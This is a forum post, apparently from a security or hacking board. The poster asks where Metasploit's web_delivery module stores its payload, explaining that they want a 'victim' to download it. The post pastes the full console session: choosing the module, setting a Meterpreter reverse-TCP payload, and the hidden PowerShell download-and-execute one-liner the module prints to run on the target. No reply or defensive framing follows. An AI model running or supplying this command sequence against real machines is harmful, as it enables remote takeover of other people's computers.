Jump to content

Where does metasploit create webshell ?!


Recommended Posts

Hello, I want the victim to download a webshell by connecting on my apache webserver. Everythings seems well but when I create the webshell, I don't know where it is ..... Look :

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set LHOST
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST yes The local host to listen on. This must be an address on the local machine or
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----

msf exploit(web_delivery) > exploit [*] Exploit running as background job.
[*] Started reverse handler on [*] Using URL: [*] Local IP: [*] Server started. [*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(''))
msf exploit(web_delivery) > [*] web_delivery - Delivering Payload

After I have to put the webshell at /var/www/html on my attack computer but I can't find it.....

root@osboxes:/# locate powershell.exe

Nothing return....

Have you got solutions ??

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...